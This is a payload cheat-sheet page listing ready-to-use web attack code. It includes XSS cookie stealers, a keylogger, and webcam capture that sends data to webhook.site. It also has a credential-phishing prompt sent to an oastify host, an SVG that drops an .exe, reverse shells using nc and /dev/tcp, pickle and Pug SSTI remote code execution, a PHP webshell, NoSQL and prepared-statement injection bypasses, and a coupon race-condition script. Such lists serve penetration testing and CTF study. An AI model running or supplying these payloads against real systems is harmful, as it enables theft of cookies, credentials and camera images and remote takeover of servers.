Payloads Search
Search for a payload by title or code.
WebSocket XSS Cookie Stealer
<img src="x" onerror="socket.send(document.cookie)">Chromium tab Crash CSS
<iframe style="background:conic-gradient(in rec2020,red,red)">Keylogger XSS with history.replaceState
<img src onerror='
history.replaceState(null, null, "../../../login");
let buffer = "";
document.onkeypress=function(e){
buffer += String.fromCharCode(e.which);
if(buffer.length >= 25) {
fetch("https://webhook.site/{webhook-id}/?k=" + buffer);
buffer = "";
}
},this.remove();
'></img>AngularJS CSTI
{{$on.constructor('alert(1)')()}}SVG Malware Smuggler
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="500" height="500">
<text x="10" ="50" font-family="Arial" font-size="20" fill="black">Open this image in a new tab</text>
<script type="application/ecmascript"><![CDATA[
document.addEventListener("DOMContentLoaded", function() {
function base64ToArrayBuffer(base64) {
var binary_string= window.atob(base64);
var len= binary_string.length;
var bytes= new Uint8Array(len);
for (var i= 0; i < len; i++) { bytes[i]= binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file= 'U2FtcGxlIGZpbGUgYnkgaWFu'; // base64 encoded payload
var data= base64ToArrayBuffer(file);
var blob= new Blob([data], {type: 'octet/stream'});
var a= document.createElementNS('http://www.w3.org/1999/xhtml', 'a');
document.documentElement.appendChild(a);
a.setAttribute('style', 'display: none');
var url= window.URL.createObjectURL(blob);
a.href= url;
a.download= 'sample.exe'; // filename
a.click();
window.URL.revokeObjectURL(url);
});
]]></script>
</svg>XSS Leak Browser information
document.addEventListener('DOMContentLoaded', async () => {
const battery = await navigator.getBattery();
const gl = document.createElement('canvas').getContext('webgl');
const debugInfo = gl?.getExtension('WEBGL_debug_renderer_info');
const tzid = Intl.DateTimeFormat().resolvedOptions().timeZone;
fetch('https://webhook.site/{webhook_id}/', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
language: navigator.language,
charging: battery.charging,
battery: battery.level * 100,
ram: navigator.deviceMemory,
timezone: tzid,
webgl: debugInfo ? `Vendor: ${gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL)}, Renderer: ${gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL)}` : 'WebGL not supported'
})
});
});
Leverage XSS to Capture Photos and Videos
<script>
const v = document.createElement('video'),
c = document.createElement('canvas');
navigator.mediaDevices?.getUserMedia({video:1})
.then(s => {
v.srcObject = s;
v.play();
v.onloadeddata = () => setTimeout(() => {
c.width = v.videoWidth;
c.height = v.videoHeight;
c.getContext('2d').drawImage(v, 0, 0);
fetch('https://webhook.site/{webhook-id}/', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
image: c.toDataURL('image/jpeg'),
timestamp: new Date().toISOString()
})
});
s.getTracks().forEach(t => t.stop());
}, 1000);
})
.catch(e => alert('Camera access error'));
</script>Prepared Statement Bypass NodeJS MySQL
{"username": "admin", "password": {"password": 1}}
username=admin&password[password]=1Race Condition on coupons -> purchase endpoint
import httpx
import asyncio
url = "http://example.com"
async def apply_coupon(session):
async with httpx.AsyncClient() as client:
response = await client.post(url + "/api/coupons/apply", json={"coupon_code": "SUMMER_2024"}, cookies=session)
session.update(response.cookies)
async def main():
async with httpx.AsyncClient() as client:
session = (await client.get(url + '/api/reset')).cookies
response = await client.post(url + "/api/purchase", json={"item": "BEER"})
session.update(response.cookies)
await asyncio.gather(*(apply_coupon(session) for _ in range(1, 20)))
response = await client.post(url + "/api/purchase", json={"item": "BEER"}, cookies=session)
print(response.json().get('flag'))
asyncio.run(main())XSS to Steal Secrets from (admin) pages
<script>
fetch("http://localhost:1337/admin-secret.txt")
.then(r => r.text())
.then(d => fetch("https://webhook.site/webhook-id/" + btoa(d)))
</script>NoSQL injection
{"username": {"$ne": null}, "password": {"$ne": null} }Node eval RCE
require('child_process').exec('sh -c "nc 192.168.1.2 9001 -e sh"')Stealing Cookies with fetch
<img src=x onerror="javascript:fetch('https://webhook.site/{id}'),{method:'POST',mode:'no-CORS',body:document.cookie});">Stealing Cookies
<img src=x onerror=this.src="https://webhook.site/?c="+document.cookie>PHP webshell cmd
<?php echo "Shell";system($_GET['cmd']); ?>Stealing Cookies less known way
javascript:navigator.sendBeacon('https://webhook.site/{webhook-id}/?c='+document.cookie)Python Pickle Deserialization
import pickle
import base64
import os
class Exploit:
def __reduce__(self):
return (os.system, ('nc 192.168.2.177 9001 -e sh',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)XSS in SVG
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>Prototype Pollution RCE in Pug
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync('bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'')"
}JsDelivr CSP Bypass
<script src="https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js"></script>PUG SSTI to RCE
#{spawn_sync = this.process.binding('spawn_sync')}
#{normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}}
#{spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;} for(c=0;c<a.stdio.length;c++){var e=a.stdio[c] && a.stdio[c].input;if(e!=null){var f=a.stdio[c] = util._extend({},a.stdio[c]);isUint8Array(e) ? f.input=e : f.input=Buffer.from(e,a.encoding);}} console.log(a); var b=spawn_sync.spawn(a); if(b.output && a.encoding && a.encoding!=='buffer') for(c=0;c<b.output.length;c++){ if(!b.output[c]) continue; b.output[c]=b.output[c].toString(a.encoding); } return b.stdout=b.output && b.output[1], b.stderr=b.output && b.output[2], b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)), b;}}
#{payload='YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjAuNDAvODA4MCAwPiYx'}
#{resp=spawnSync('bash',['-c',(new Buffer(payload, 'base64')).toString('ascii')])}Vue.js V2 CSTI
{{constructor.constructor('alert(1)')()}}Vue.js V3 CSTI
{{_openBlock.constructor('alert(1)')()}}XSS in CDATA steal Login Credentials
<![CDATA[<]]><img src="x" onerror="var credentials=prompt('Please insert username and password separated by a colon (e.g., username:password):'); if(credentials) { var img=new Image(); img.src='https://ujhhrlvlfyivfk73njj018g7tyzpngb5.oastify.com?credentials=' + encodeURIComponent(credentials); document.body.appendChild(img); }"/><![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>